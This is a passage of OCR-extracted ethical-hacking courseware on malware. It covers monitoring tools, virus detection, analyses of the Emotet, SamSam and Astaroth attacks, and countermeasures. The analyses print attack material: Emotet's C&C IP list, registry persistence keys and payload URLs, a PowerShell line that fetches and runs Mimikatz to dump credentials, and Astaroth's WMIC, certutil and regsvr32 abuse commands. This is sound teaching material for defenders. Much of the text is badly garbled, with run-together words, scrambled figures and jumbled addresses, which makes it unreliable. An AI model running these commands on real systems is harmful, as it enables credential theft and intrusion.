number,query ID,request type(A,AAAA, NS,MX,and so on},requesttime, response
time,duration,response code,numberof records, and content of the returnedONS
records.You can easilyexport the DNS query informationto a CSV/tab-
delimited/XML/HTML file or copy the DNSqueries to the clipboard
andthen pastethem
into
Excel applications.
or otherspreadsheet
ical andCountermensores
Mackin ©by E-Comel
Copyright
IHW
ONSQuerySifer
file fst
theme,
View
-
Options
Help
eatekPC GBE
Family
Controller
°
Host Name
Request
@toginmicrosottontine
Queryi0 ypeRequest
Time Response
Tam
019321
2
© 1" 2.
loginmierorttonine
sutheveteamemicros
:
2019321
0193.22
222
9
@suthoveteamsmicrs.
©
Que T2019
vs-spiazmskypecom
usapiasmasypecom
2 gomicroste
com
@gomicrosttcom
@ma metasenices mi
2
2019322
©
amametacenices
beaconsgr2.com
@
@bescons.gt2.com
A
019322
ote
19527217172in-ade
Figure791:SereenshotofONSQUerySniffer
ONSmonitoring/resolution
Someadditional toolsare as follows:
DNSstuff (https://www.dnsstuff.com)
+
DNSLookup
Too!(https://www.ultratools.com)
Sonar Lite (https://constellix.com)
Module
7 1021
Page tical andCountermensores
Making by Comet
Copyright©
MalwareAnalysis:
Dynamic API Calls Monitoring
OS
1@Appletonprogramming
trices (AP)
‘ofthe
Windows thatslow externalppeaons APIMonitor
KPICalls Monitoring
Application
programming interfaces(APIs)
are partsof the WindowsOSthat allow external
applications
to access OSinformation suchas file systems,
threads, kernel,
errors, registry,
buttons,
mouse pointer, web,andthe Internet. Malwareprogramsalsouse
networkservices,
theseAPIsto accessthe OSinformationandcausedamage to thesystem,
the
Youneedto gather APIsrelatedto the malware programsandanalyze
interaction withthe OSas well as the activities theyhavebeenperforming
themto revealtheir
over the system.
Use
APIcall
=
monitoring
tools
Monitor
API
to API
suchas APIMonitor monitor callsmadebyapplications.
https://www.apimonitor.com
Source:
‘API
Monitor is a
by applications.
information, including
monitor
display
softwarethat allowsyou to
displays
It can trace any exported
and
API and it
Win32 API callsmade
a wide range of
function name, call sequence, inputand outputparameters,
functionreturn value,etc. It is 2 usefuldeveloper tool for understanding
howWin32
applications
workandfor learning theirtricks.
ical andCountermensores
Mackin ©by E-Comel
Copyright
vel sed ve
7.92:Screenshot
Figure of A P Monitor
Someadditional toolsare as follows:
APImonitoring
=
(https://opimetrics.io)
APImetrics
(https://www.runscope.com)
Runscope
=
Alertsite(https://smartbear.com)
ical andCountermensores
Mackin ©by E-Comel
Copyright
Virus DetectionMethods
|©
Checkingproducts
|~forte by
eaing
enti letgry
tiesandayem
Integelty logy
that
a3 cheng work
score
the ik n d racrdng dt st centre
|
InterceptionTheinercepter
mentors theoperating system requests
thatate writen theok
Code
Emlation
rd
edmeraracai
et
polymorphs the itu
indeaingwtheneyted
Ha Frac
owrstie
VirusDetectionMethods
Theruleof thumbfor virus andworm detectionis that if an emailseems suspicious(i.e,if the
an e-mail
Useris not expecting fromthesenderanddoesnot knowthesender), or if the email
headercontains something that a knownsenderwould not usually say, the user must be
carefulaboutopeningthe email, astheremight
bea riskofvirus infection.
The MyDoom andW32.Novarg.A@mm
worms haveinfected of manyInternet,
the systems
Users,mostly
through
e-mail
‘The
+
for
bestmethods
Scanning
virus detectionare as follows:
+
Integrity
checking
Interception
*
CodeEmulation
+
Heuristic Analysis
a combination
Furthermore, ofthesetechniques
can bemore effective.
+
Scanning
A virus scanner is an essentialsoftwarefor detecting
viruses. In the absenceof a
scanner, itis highly
likely
that the system
will be attacked
bya virus. Run antivirus tools
continuously
and update
the scan engineand virus signature
databaseon a regular
basis,Antivirus softwareis of no use if it does not knowwhat to lookfor. Thescanning
for
virus detectionis performed in the ways
following
ical andCountermensores
Mackin ©by E-Comel
Copyright
a cross the globe
Oncea virus is detectedin the wild,antivirus vendors identify
its
signaturestrings(characteristics).
The vendors start writingscanningprogramsthat look for the virus’ssignature
strings.
Theresultingnew scanners search
ofthenew virus.
strings
memory filesandsystem
for
sectors the signature
‘Some
scannersset up a virtual computer RAMand test the programsby
in a machine's
them i n thisvirtual space.Thistechnique,
executing calledheuristicscanning,can also
checkand remove messages that mightcontain a computer virus or other unwanted
content.
‘Advantages
ofscanners
can check
They programsbeforeexecution
©. They
Drawbacks
re the
easiest
of scanners
way to checknew softwarefor knownor
malicious
viruses.
© Oldscanners maybeunreliable.Withthe rapid
can quickly
market.
increase i n new
viruses,
old scanners
becomeobsolete.It is bestto use the latestscanners availablein the
ical andCountermensores
Mackin ©by E-Comel
Copyright
Someintegritycheckers combineantivirus techniqueswith integritychecking
to
create a hybrid
tool.Thissimplifies
the virus checking
process.
Interception
©. Theprimary of an interceptor
objective logic
is to deflect bombsandTrojans.
Theinterceptorcontrolsrequests to theOSfor networkaccessor actionsthat cause
to
threats programs.If it findssucha request,
toallowthe requestto continue.
it popsup andasksif the user wants
©
for
input
instructions and byvirus.
outputinstructionsthe
Someviruses can disablethemonitoring
programitself.
CodeEmulation
Using
codeemulation,
antivirus softwareexecutesa virtual machineto mimic CPUand
memoryactivities. Here,virus codeis executed o n thevirtualmachine insteadof the
real processor. Codeemulation efficiently deals with encrypted and polymorphic
viruses. After theemulator i s run fora longtime, the decrypted
virus body eventually
presents itselfto a scanner for detection.It alsodetectsmetamorphic viruses (single
or
multiple encryptions). A drawbackof codeemulationis that it is too slow if the
decryption loopis verylong,
HeuristicAnalysis
Thismethodhelps i n detecting
new or unknownviruses that are usually variants of an
already existingvirus family.Heuristicanalysis can be static or dynamic. In static
analysis, the antivirus tool analyzes
the file formatandcodestructure to determineif
thecodeis viral.In dynamic analysis,
the antivirus tool performs codeemulationofthe
suspiciouscodeto determineif the codeis viral. Thedrawbackof heuristicanalysis is
that itis proneto too manyfalsepositives (i.e.,
it tagsbenign
mightmistrust a positivetest resultand mistakenly
attackoccurs.
as
code viral);thus,a user
assume a falsealarmwhena real
ical andCountermensores
Mackin ©by E-Comel
Copyright
Trojan Emotet
Analysis:
| Totes
boning
Ton
which
an
ection bath ar jon yi of ter
banking ole
e e Orson P | ttm
ern
°
‘Targets
‘Trojan Emotet
Analysis:
Source:https://www
fortinet.com
ical andCountermensores
Mackin ©by E-Comel
Copyright
EmotetMalwareAttackPhases
Thevarious phases
and corresponding
stagesInvolvedin an Emotetmalwareattackare as
follows:
Infection MaintainingPersistence
© wrcincccin
|QOirrnasaans
System
Compromise
i I |
Figure7.93:
Emotet infection low
pracess
il an Countermeasures
Macking oy recounet
EmotetMalwareAttackPhases:InfectionPhase
InfectionPhase
‘=
Stage
1:
Initial
Infection
Initial infection occurs through macro-enableddocumentfiles,
maliciousscripts,
malicious links,andspamemails.Thespamemaili s sent to thevictim with a malicious
URLand it is disguised as a legitimate
email, luring
thereby the victim into clicking
the
link
7.94:
Figure Spamemail
wth malicious content istributingEmotet
ical andCountermensores
Mackin ©by E-Comel
Copyright
2: Malicious
Stage .docFileDownload
When thevictim clicksthe link,i t redirectsto downloada maliciousdocfile. Thus,the
Emotet malwareenters the victim’s systemand startsits attacking process.Theoriginal
filename of the infected documentis PAY09735746167553.doe and it contains
maliciousV BAcode (Visual Basicfor Applications)i n a macro. TheVBA codecomes as
partof the maliciousMSOfficedocument.Assoon as the macrosare enabled, the code
executesi n the background, ThemaliciousV BAcodeis automatically executedusingits
"autoopen―function once a victim clicksthebutton“Enable Then,
Content―. aftersome
time,it generates a ton of PowerShell codeand executes it. TheactualEmotet file is
downloaded fromthe generated PowerShell codefromseveralURLs, whichis generated
dynamically
asa.
ical andCountermensores
Mackin ©by E-Comel
Copyright
EmotetMalwareAttackPhases: Persistence
Maintaining
Phase
fo fier
Mimcrnnppoctat\cuteuessuece\
re6: €:
Deploying
Timer
Func
‘Stage
Encryption. Stage
(©Asings
Abts
|| motte
andallimported
encrypted
SetTimarto
enable
the
@
Windows ussthe AP
once12 Tiscallback
fonction ead evry 1000mieconds
Maintaining
PersistencePhase
‘=
3: EmotetRelocation
Stage andCreationof Firstculturesource.exe
Bydefault,
Emotetmalwarewill be downloadedi n the stempsfolder.Whenit runs,it
comparesthe file pathof the current process,and if it is not the same as
SLocalAppDatat\culturesource\culturesource.exe, it moves the original .exe file
fromthe tempt folder to the previousfolder mentioned,
and the file is renamedas
ical andCountermensores
Mackin ©by E-Comel
Copyright
culturesource.exe. is a constant stringdecrypted
The word“culturesource― from
memory.
TheAPISHFi1eoperationk is calledto perform
the file relocation.ThisAPI is calledi n a
timer callback
function,whichwe shalldiscusslater.Therelated assembly computer
language(ASM) codesnippetis as follows:
bed
002FFB9Aloc_2FFBOA: 1} CODExREF:
‘sub_311D78+1F3
002FFBSA call ds:memset
OO2FFRAO call aub_2F1250 sCreateDirectoryW
OO2FFBAS push 1Bh
OO2FFRAT lea eax, [ebp-20h]
OO2FFBAA push edi.
OO2FFBAB push eax
;
OO2FFECR mov dword ptr [ebp-14h],offset
‘LocalAppoatat\culturesource\culturesource..exe
word_307EE0 ;
Modul
7 1034
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
starts runningnormally,the firstone exits. Now,Emotetdynamicallyreleases codeand
the relateddata into memory blocks.Here,most of the functionsare splitinto several
partsto increasethecomplexity ofthe codeanalysis.
Asshowni n the screenshot below,
a normalfunction is splitinto seven parts,all of whichare connectedusing “3mp
tomcode
instructions,
ake more
analysis difficult
5:
Stage Encryption
797:A
Figure
normal
funetion
spitintoseven parts
ical andCountermensores
Mackin ©by E-Comel
Copyright
Stage
6: Deploying
Figure
Timer Function
798:Derypted a ndloaded
string
APfromuser32
ical andCountermensores
Mackin ©by E-Comel
Copyright
case 1
HIDWORD(qword_307¢94)
0; =
check_
ie
‘eub_2F6BA0()
‘
Af process_is_in correct
goto LABEL_7
_path() )
eub_2F7170()
v4 =
GetTickCount() ©OxBBau;
()
HIDWORD
=
GetTickcount
(qword_307¢94) =
2;
LODWORD
(qword_307¢94)
break
= va + v5 + 3000
case 2
HIDWORD
Af(qvord_307¢94)
( sub_2F8300()
6 sub_2F8430()
4&6 sub_2F8820()
G6 sub_2Â¥9580()
6 sub_2FA320()
66 sub_2FB750()
46 sub_2F6800()
)
dword_307¢C4
(int) Gunk_3080E8;
=
aword_307CC8
dword_307CcC
106; =
(int) sunk_303430;
=
= ():
V6
v1 =
GetTickcount()
GetTickCount
+ oxBBBu,
RIDWORD
(quord_307¢94)
=
LODWORD
(qvord_307C94)
=
3
v6 + v7 + 3000;
(quord_307¢94)
BIDWORD
,
break
case 3
(qvord_307¢94)
HIDWORD
v8
v9 = =
GetTickcount()
sub_2FCB20()
ical andCountermensores
Mackin ©by E-Comel
Copyright
HIDWORD
(qvord_307C94)
LODWORD
(qword_307C94)
=
=
3,
v9 + v8
break
care 4
SetEvent (dword_304c0C)
break:
default:
return,
‘Another
purposeis to set up a Windowsservice named“culturesource―
for running
Emotetat Windowsstartup,whenit can open the ServiceControlManager successfully
(bycalling
the API openscManager#).Meanwhile, is movedto
“culturesource.exe―
the folder “swindixt\aystem32―.
ical andCountermensores
Mackin ©by E-Comel
Copyright
In the abovecodesnippet:
Case1 is usedto initializeseveralDLLmodulesand decrypt
the exported APIfunctions
Emotet
that uses, including
the
"uelmon21, ‘wininet .dl1," andso on.
Duringthis stage,
server.
andexecutes commands fromthe C&C
usingtwo methods:the system
Emotet maintains persistence service
following
and the auto-run in the systemregistry.Emotetcreates the auto-run entry
named“culturesource― under the sub-keys i n the systemregistryto maintain
andthe after
reboot:
persistenceaccess victim’s
machine
even
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVers
©
© RREY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\Cu
sion\Run
tware\Microsoft
HKEY_CURRENT_USER\Sof \Windows\CurrentVersion\Run
7.201:
Seeenshot
Figure ofthe addedauto-un entry “culturesource―
inthe Registry
Eltor
ical andCountermensores
Mackin ©by E-Comel
Copyright
Emotet MalwareAttackPhases:
System Phase
Compromise
thecontapous
pois
Akerreceing
‘parades
themales
instructions
ofthe
o males pao rm he males CRsre,
tel an prfoms exploitation system
otek
System Phase
Compromise
=
Stage 7: Communication with C&CServer
In stage 6,i n case 0, it is codedto callseveralAPIsandcollectthe system
information
suchas computer name, filesystem, andvolumebycalling the APIsGetComputerNamew
and GetVolunernformationw. It putsthe two data sets togetherand saves them i n a
slobal whichis usedin theC&Cserver as theIDforthisvictim. ThisID willthen
variable,
beusedin the packets that communicatewith the C&Cserver. Emotetthencalculates a
of
CRC32its EXEfileandsaves it in another
the first packet
to theC&Cserver.
global whichis usedwhensending
variable,
ical andCountermensores
Mackin ©by E-Comel
Copyright
thevaluewitha blueunderscorei s thelength
of the following
data,whichusesa typeof
UTE-8encoding.
Put
data
Figure7.102:
intogether a structure
After receiving the transferredinformationfromthe infectedvictim’s machine, the C&C
server checks if there are analysis
tools(sucha s Wireshark anddebuggers) runningon
the victim’s machine.If any suchtools are detected, it will not replywith any data’
otherwise, it will provide the required
maliciousinstructions anddeploy the contagious
payload. As can be seen in the screenshot, the C&Cserver replies with the instruction
data,
Figure7.108:
Send
data
to
collected
ical
CBC
server
andCountermensores
Mackin ©by E-Comel
Copyright
TheIP list of C&Cservers is hardcodedinto its memoryandsavedin a global variable,
EachIP and portpair uses 8 bytes, and there are 62 C&Cservers i n total. Thelist of
hardcoded
i>
IPand
72,91.161.118port
is as follows:
:: 22
02> 70.164.196.211 995
03> 175.101.79.120
04> 187.233,136.39 :: 80
143
05> 5,107.250.192
06> 50.224.156.190 :: 995
8080
07> 5.107.161.71
08> 186.179.243.7 :: 993
995
09> 72.240.202.13
10> 190.215.53.85 ::
80
443
11> 133.242.164.312
32> 115.71.233.127 ::
7080
443,
13> 69,136,227.134
1d> 216.49,114.172 :: 22
443
:::
15> 153.121.36.202 7080
16> 181.119,30.27 995
17> 710.164.196.211 20
:;:
18> 98.157.215.153 80
19> 62.75.187.192 8080
20> 189.234.165.149 8080
:::
21> 154.72.75,82 20
22> 45.123.3.54 443
23> 217.13.106.160 7080
24> 75.99.13.124
25> 198.74.58.47 : :
7080
443
26> 69.195.223.154
27> 172.114.175.156 :: 7080
8080
28> 73.124.73.90 : 20
29> 74.80.16.10
30> 24.11.67.222 : :
80
443
:::
31> 181.143,53.227 21
32> 173.76.44.152 20
33> 208.78,100.202 6080
:::
34> 47.44.164.107 993,
35> 45.63.17.206 2080
36> 50.31.0,160 8080
7
Module 1082
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
37> 62.75,191.231
38> 98.142,208.27 ;: 8080
443
39> 78.187.172.138
40> 67,205,149.117 ::7080
443,
41> 98,186.90.192
42> §.230.147.179 :: 443
8080
;:;
43> 50,240,162.242 995
44> 94.76.200.114 8080
45> 178.62.37.188 443
:::
46> 83.222,124.62 8080
47> 70.184,83.93 20
48> 173.255.196.209 8080
49> 208.107.230.235
50> 186.179.80.102
: :
20
443,
51> 72.95.118.97
52> 162.250.19.59 :: 22
80
:: :
53> 134.129.126.86 443
54> 69.198.17.7 8080
55> 8.17.46.42 53
:::
56> 70.90.183.249 7080
57> 47.149.54.132 8080
58> 200.116,160.31 80
59> 175.143.84.108
60> 178.254.31.162 ;:
50000
8080
::
61> 175.110.104.150 20
62> 211.115.111.19 443
Stage
8: System
Compromise
After receivingthe maliciousinstructions or maliciouspayloadfromthe maliciousC&C
server, Emotetupgrades itselfandexploits In this stage,Emotetactually
the system.
compromisesthevictim'smachine.
7
Module 1082
Page ical andCountermensores
Mackin
©by E-Comel
Copyright
Emotet MalwareAttackPhases:
NetworkPropagation
Phase
Stage
9: Network Propagation,
(©
Ate infecting
(©
thevicki’
system, second kay
Emote’
spreader
Emoteuse ve known
currently, modules
goals tospreadtheinfection
aros
local
networks
Emotet
allsome
employsor
network ofthese
network target
machine modules
propagation onthe
depending and
‘Network Phase
Propagation
=
9:
Stage NetworkPropagation
After infecting
thevictim'sdevice, next keyobjective
Emotet’s is to spread
the infection
across local networksand beyond as many machines
to compromise as possible
Currently,
Emotet uses five knownspreader
modules:NetPass.exe,
OutlookScraper,
WebBrowserPassView, anda credentialenumerator.
Mail PassView,
©
passwords ~
NetPass.exeIt is a legitimate
utilitydeveloped byNirSoft.It recovers all network
storedon a systemfor the current logged-on
recover passwords
user. Thistool can also
storedin thecredentialsfile of externaldrives.
Outlook ScraperIt ~
is a tool that extracts names and emailaddresses
from the
victim'sOutlookaccount and usesthisinformation phishing
to sendout additional
fromthe compromised
‘emails account.
WebBrowserPassViewIt is a password
~
passwords
recovery tool that captures
storedbywebbrowserssuchas Internet Explorer, Google
MozillaFirefox, Chrome,
Safari,
andOpera.
It can passthemto the credentialenumerator module,
Mail PassView It is a password
~
recovery
tool that revealspasswords
detailsfor various emailclientssuchas Microsoft
Thunderbird, Hotmail,
Yahoo!Mail,and Gmail,
and account
Outlook,WindowsMail,Mozilla
and passesthem to the credential
module.
‘enumerator
CredentialEnumerator It is a self-extracting
~
RARfile containing two components.
is the bypass
‘One component, andthe other is the service component. Thebypass
component is usedfor the enumeration of network resources, and it elther finds
writablesharedrivesusingthe Server Message Block(SMB) or tries to brute-force
ical andCountermensores
Mackin ©by E-Comel
Copyright
User accounts, including
the administratoraccount. Oncean availablesystemis
found,Emotetwrites the service component
on the system,
whichwrites Emotet
onto thedisk.Emotet’s
accessto SMBcan resulti n theinfection
of entire domains
(servers
employs
Emotet
some
andclients).
or all of thesenetworkpropagation depending
techniques
on
the
targetmachineand network.After infecting machinesin the network,
the possible
Emotet phases
performs
the same as those discussedabove to compromise the
machines.
(10C)
Indicatorsof Compromise for Emotet:
ThismaliciousWorddocumenthas been detected as “VBA/Agent.AFD!tr.dids―
and the
original
Emotetfilehasbeendetected
a s “W32/Enotet.GBUK!tr―
bythe FortiGuard
AntiVirus
=
URL
//muathangnhom.
"“hexp: com/6DOpkn0L9_yf0"
:///gnevietnam.
“hexp: vn/abMbIaT2HsDkAq―
hexp / augoclub.sk/yCq4xkYzeqAgK_v"
/foreprojects.webedge.com.ng/Le3UYxXyQixx_Dp’
huxp:
://evonline. Liceoriosdechile..com/NpDgofVhpankbq_18AaJbz93"
“hexp
‘Sample
SHA256
PAY09735746167553..doc:
1194bab2c4aGe63e59e£01
Emotet/Original
Downloaded
6da30e713¢2
Exefile:
‘7¢5cDC5B738F5D7B40 40F2CCOA730B61845B45CBC2A297BEE2D9506S7CABESS
ical andCountermensores
Mackin ©by E-Comel
Copyright
Virus SamSamRansomware
Analysis:
ansorware
employs
Protea!
Propagation paste
weak
password
ofRemote
estoy
Samsam
ROP)
toga azn
ute ore ats
the
the
‘Virus SamSamRansomware
Analysis:
Source:https://www.secureworks.com
SamSam ransomware is alsoknownas Samasor SamSamCrypt. It is a notorious ransomware
that is associated with theGOLDLOWELL threatgroupforperforming targeted attacksagainst
global multi-nationalcompanies.It exploits vulnerableunpatched servers present i n the target
networkusinga rangeof exploitation methods. SamSam ransomware attacksskyrocketed in
2018, although the ransomware was developed andreleasedi n 2016.In 2018, it was shrewd
enough to capture wide mediaattention to targeta specific rangeof top-class organizations
across the globe. Unlikeother ransomware, this ransomware doesnot attackthe victims on a
randombasis. It is a targeted ransomware that specifically targetscertain reputed companies.
In spiteof knowing this, largemulti-nationalcompanieswere unableto defendthemselves
againstthis attack. This ransomware not onlyaffected the operationsof government
organizations, schools, and the healthcaresector but also affected common people by
encrypting their crucialmedicalrecordsrequired for proper diagnosis. As with any other
ransomware, after infiltrating into a system, it encrypts the filesand prevents the users from
Usingthosefiles until a heavy ransom is paid i n bitcoins.Thisransomware does not have a
specified ransom pricing,After infecting systems, theattackersdemanda ransom depending on
the typeof victim.
Propagation:
Nearly andperform
all ransomware usesspamemailsto propagate attacks;
however,
SamSam
ransomwareemploysbrute-forcetactics againstweak passwordsof the RemoteDesktop
Protocol(RDP)
to gain access to the victim’s
machine.Oncethe targethost is infected,
it
performs
networkmapping to searchfor otherexploitable
assetsi n the network.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Encryption:
SamSamadoptsthe RSA-2048asymmetric technique
encryption to encryptlocal files i
infectedsystems.
Symptoms:
A ransom note appearso n the screen,demanding
a ransomin bitcoins.
Structure:
‘The
SamSamransomware following
consistsof the components:
=
mainly
Batchfile: Thebatchfileis responsible themalware.
for executing
=
Runner:The runner tries to perform
component andthe payload
decryption, is then.
executed.
Decryptor: It tries to decrypt
the payload,
whichis placed
i n a separateDLLfile. Then,
the keywill begenerated fromthe password
providedbythe attackers.
ical andCountermensores
Mackin ©by E-Comel
Copyright
SamSamRansomwareAttack Stages
== e
PosBpotation ‘Beplitation
@ eo
Modul
7 1088
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
SamSamRansomware
Attack Stages
(Cont'd)
etch
Sorpt
Sarafam
payloe
Exploitation Deploying chartcter.eme)
(8
Alter
gaining
access
to
‘atch fle (at eee
alle
on ery
© detereor detlerype
exe
(SDelete
Syinternal
rogram)
©
slide
(used one
mmabcovs sett)
to delete
ts
SamSamRansomwareAttack Stages
(Cont'd)
Exploitation
(Cont'd)
ical andCountermensores
Mackin ©by E-Comel
Copyright
SamSamRansomware
Attack Stages
(Cont'd)
Post
Exploitation
anBoi
1 8 rethenaplays HTML
that
(Ransom
rmessoge
‘stem
e xtortion
mount
Not) ontheVito's
demands
SamSamRansomwareAttack Stages
SamSam
ransomware attacksoccur in threephases:
=
Pre-Exploitation
Phase
=
Exploitation
Phase
=
Post-Exploitation
Phase
Figure
in
7-104 StagesSamSam
Ransomwareattack
Modul
7 1050
Page tical MakingandCountermensores
by
Copyright©
Comet
Pre-Exploitation
Phase
‘=
Stage
1:Gains
Access
Servers
In the initial stageof the
to Vulnerable
pre-exploitation
phase,
the SamSam
ransomware attackers
checkfor the presenceof unpatched i n Internet-facing
ROPvulnerabilities remote
servers to gain an initialfootholdi n the victim'snetwork.
Stage
2: Harvests AdminCredentials
SinceSamSam ransomware creators are capable andefficient
i n combiningcommodity
and proprietary toolswith
vulnerableunpatched
ROP
publicly
availableexploits
and techniques,
servers with the RDPprotocol,
theyemploy
brute-forcetoolsto harvesttheadmincredentialsandperform
once they identify
Mimikatzor NLBrute
privilege
escalation.
It hasbeenfoundthat the attackersmainly use PowerShellcommands to callMimikatz
froman onlinePowerSploit repository.
powers (New t
Net .WebClient)
.DownloadString(
‘https:
//raw.githubuse
|imikatz.ps1');Tnvoke-Mimikatz
-DumpCred
Stage
Figure
3: Spreads
7.106:
Infection
Screenshot
ta
dslaying
PowerShell
commanddownload
Mimikatz
the attackersgetadminaccess,they
‘Once performreconnaissance of the compromised
networkinfrastructureusingcustom scriptsor SystemTools’ Hyena tool. Theyalso
create SOCKSproxiesto tunnel the traffic and exploitlegitimateadmintoolssuchas
PsExec, WMI,and ROPto spread and execute SamSam on the rest of the computers
presentin the network.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Exploitation
Phase
Theexploitation
phase
is illustratedin the figure
below:
Stage
4: Deploys
Payload
7.207:
Figure
phase
flow
Exploitation
7108:
Figure
Batch
Script
Thiscustom ransomware .NETbinary
Deploying
(.bat)
file
payload(chareter2.
SamSom
originally
eve)
containedtwo embedded
executables:del.exeor detfiletype.exe
(SDelete program)
Sysinternals and selfdel.exe
{used activity)
to deleteits malicious
igure 7.109:
amnSam
RansomwareBinary
ical andCountermensores
Mackin ©by E-Comel
Copyright
5:
After executingthe binary
andLocal
Stage ExecutesPayload Encrypts Files
file,the ransomware performs encryption of the targetfiles
matching a hard-codedlist of approximately 300 file extensions. Beforestarting the
encryptionprocess, it categorizes the filesbysize (less than250MB,S00MB,1000MB,
and larger than 1000 MB)and encrypts the smallestfiles first. The malwarealso
attemptsto unlockfilesthat are i n use,presumably to ensure that active documents are
encrypted,
andcause
Filesare encrypted
maximum
to
the
damage victim,
usingthe WindowsCryptography
API with a symmetric-encryption
algorithm (Rijndael)
keythat is randomly
generated
on the compromised
system.The
ransomware the Rijndael
then encrypts keywith an RSA-2048 publickey,thereby
providing
adequate fromthe incidentresponders’
protection recoveryefforts.
ofhard-coded
7.110:Examples
Figure targetfle extensions
Phase
6: Demands
Stage forRansom
After encryptingthe filesof interest,the ransomware launchesthe WindowsSDelete
programto wipe the free spaceon the diskto hinderrecoveryefforts.Themalwarealso
deletesthe main ransomware binary andthefreespacewiper.Then,it deploys another
binary to delete all backup files from the local systemand any network-accessible
drives.Whenthe encryption is complete, the ransomware displaysan HTMLextortion
message(ransom note)o n the victim'ssystem,demanding a bitcoinamount for each
affected systemor a largeramount forall affected systems.Themessage alsospecifies a
seven-day deadlinefor payment. Thevalue of the ransom changes every year. The
current valueof the ransom that the SamSam ransomware is demanding is 3 bitcoins
(approximately$41,700) for all systems.
ical andCountermensores
Mackin ©by E-Comel
Copyright
The creators of SamSamransomware use a WordPresswebsite to coordinate
ransomware with the victims. Once the victim pays the ransom, the threat
payments
a download
actors provide linkto a uniqueXMLexecutable file andthe corresponding
RSAprivatekeyto decrypt
thefiles.
Key
Software,
All
Keys,
to Pay
WeGenerate Wrong
[BTC you
15Keys
receive
You Should AOBTC
you want can get
to receive allKeys,
and send
Send
18BTC
18
to al Please
15
PC
na
now
{ater receive keys, comment
deadline
Your
extended
Leavea comment
to
RecentComments
Uncategorized
ical andCountermessores
Mackin
©
by E-Comel
Copyright
to avoid attention fromlaw enforcement
Sometimes, agencies,threat actors also
onlyfromthe
coordinateransom paymentsandcommunicationsvia websitesaccessible
Tornetwork
‘Your
comments
Modul
7 1055
Page tical andCountermensores
Making by Comet
Copyright©
FilelessMalwareAnalysis:
AstarothAttack
‘Tins
csc ria oe le
%. x,
ical andCountermensores
Mackin ©by E-Comel
Copyright
‘=
Step
2: Exploiting
WMIC
Step2.1:TheBATcommandexecutedi n the previous
below: step
runs WMIC.exea s shown
Figure7.14:Running
WMICexe
In the abovecode,the /formatparameter downloadsthe v.txt file,
sent to WMIC.exe
XSL
file
‘an hostedon a malicious
that is automatically
domain.Thisfilehasan embedded JavaScript
executedbyWMIC.exe.Furthermore,the JavaScript
code
code runs
WMIC.exe
once
©. Step
again.
2.2:WMIC.exeis executedagainas follows:
/
WwUC.exeo s get QUTSQRK, 2m a, Freeshysicaleenory
orast "https: storage.googles
Figure7115:
Running
WMIC
exe
3:
Step Exploiting
Bitsadmin
The Bitsadmintool is executedmultiple
times to downloadadditional payloads
as
Figure7.126:
Expoting
itzadmin|
Thedownloadedpayloadsencoded
falxconxrenwb.~,
falxconxrenwxb.~,
using
are Base64,
falxconxrenw64.~,
falxconxrenw98.~,
and
their
filenames
are
as
follows falxconxrenwxa.~,
falxconxrenwgx.gif,
falxfonxrenwg.gif
Step
4: Exploiting
Certutil
AttackersabusetheCertutiltool to decodethe downloadedpayloads
as follows:
decode*PUBLICS\Libraries\temporary\Falxconxrennb.
\temporary
certutil.exe jpg.7 XPUBLICR\Libraries
\falxconsreni.~
ical andCountermensores
Mackin ©by E-Comel
Copyright
Onlytwo filesare decoded whiletheothersremain in theencoded
into the DLLformat,
andobfuscated
format.
5:
Step Exploiting
Now,attackers
Regsvr32
u se the Regsvr32
tool to execute the decoded
DLLfiles usingthe
following
command:
regsvr32 /s falxconxrenw64.~
falxconxrenw64.~ is a proxy DLLthat loadsand executes the secondDLLfile,
falxconxrenw98..~. Furthermore,thesecond DLLinitiates the execution ofthirdDLL
retrievedfromfalxconxrenwxa.~ andfalxconxrenwxb.~
6:
Step Exploiting
Userinit
The third DLL loadedand executed i n the previous step reads and decodes
falxconxrenwgx.gifinto a DLL.This DLLis used to initiate the execution of
userinit.exe and injectsthe decoded DLL.falxconxrenwgx.gif is a proxy DLL
that retrieves,decodes, and loadsthe final DLL falxconxrenwg.gif,calledthe
Astaroth, whichis an informationstealer.
ve v
rn «
Figure
7.118:
Demonstration
ofAstaroth
Attack
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
©Fetanconcepts =
e Virus and
Worm
Concepts Anti-MalwareSoftware
Countermeasures
Malwareis commonly usedbyattackersto compromise targetsystems. malware
Preventing
‘This
a easier
fromentering system
section presents
to
is far thantrying eliminate it froma n infectedsystem.
various countermeasures that prevent malwarefrom enteringa system
andminimize
the
riskby entry.
caused it uponits
ical andCountermensores
Mackin ©by E-Comel
Copyright
Countermeasures
Trojan
alul necessry
‘lock
host
portsa t the and
patches
Install
andupdates
secunty for
Monitortheintral rafflefor od
network un how.baad
ants, Frewalanditruson
vate
portsorenented onsofeware
Countermeasures
‘Trojan
Trojans
Somecountermeasuresagainst are as follows:
+
Avoidopeningemailattachments receivedfromunknownsenders
*
*
Block
unnecessary
ports
all
hostfirewall
Avoid accepting
programs
at the
transferred
andusea
byinstant messaging
Hardenweakdefault configuration
settingsanddisableunusedfunctionality,
including
protocols
andservices
Monitorthe internalnetwork
trafficforoddportsor encrypted
traffic
Avoiddownloading applications
andexecuting fromuntrustedsources
Installpatches updates
andsecurity forthe OSandapplications
ScanexternalUSBdrivesandDVDswith antivirus softwarebeforeusingthem
withinthe desktop
Restrictpermissions environment to preventinstallationof malicious
applications
‘Avoid
typingcommands blindlyandimplementing
pre-fabricated
programs or scripts
Manage localworkstationfile
Runhost-based
integrity
through auditing,
checksums,
andintrusion detection
antivirus,firewall,
andport scanning
software
ical andCountermensores
Mackin ©by E-Comel
Copyright
BackdoorCountermeasures
anv
cn san anddetectb ackdoor
products automaticaly programsb eforethey
Educate
vers not sal appltonsdownloade
fomuntrusted
intemats es andeal attachments
BackdoorCountermeasures
Somecommon countermeasuresagainst
backdoors
are as follows
=
Most commercialantivirus products
can automatically
scan and detect backdoor
programs
before
they
can
cause
damage
Educateu sers to avoidinstalling
applications
downloadedfromuntrustedInternet sites
andemailattachments
Avoid untrusted
software
andensure thata firewallprotects
everydevice
Useantivirus toolssuchas McAfeeand Norton,
to detectandeliminatebackdoors
Trackopen-source projectsthat enter the enterprise
from untrustedexternalsources
suchasopen-source coderepositories.
Inspect
